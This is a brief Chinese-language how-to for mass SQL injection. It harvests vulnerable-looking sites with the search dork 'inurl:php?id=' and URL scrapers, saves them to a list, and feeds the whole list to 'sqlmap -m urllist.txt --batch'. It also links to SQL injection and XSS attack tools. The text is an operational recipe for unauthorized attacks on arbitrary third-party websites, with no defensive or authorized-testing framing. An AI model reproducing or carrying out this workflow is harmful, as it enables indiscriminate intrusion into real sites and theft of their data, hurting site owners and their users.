python3编写的sql批量注入攻击
首先通过搜索引擎扫描抓关键词 inurl:php?id=
https://github.com/lvwuwei/sql_scan_urllist
url_scrapy.ipynb
superl-url 关键词URL采集
https://github.com/super-l/superl-url
sqlmap -m urllist.txt -–batch当前目录的list
sqlmap -m /root/sql_scan_urllist/urllist.txt -–batch
其次抓取的地址复制保存到urllist.txt集体测试
https://github.com/lvwuwei/sql_scan_urllist
sql_scan_urllist.py
windows版sql注入
https://github.com/lvwuwei/SuperSQLInjectionV1
编译得到 超级sql注入
https://github.com/s0md3v/XSStrike/ 注入
使用说明查看
https://github.com/s0md3v/XSStrike/wiki/Usage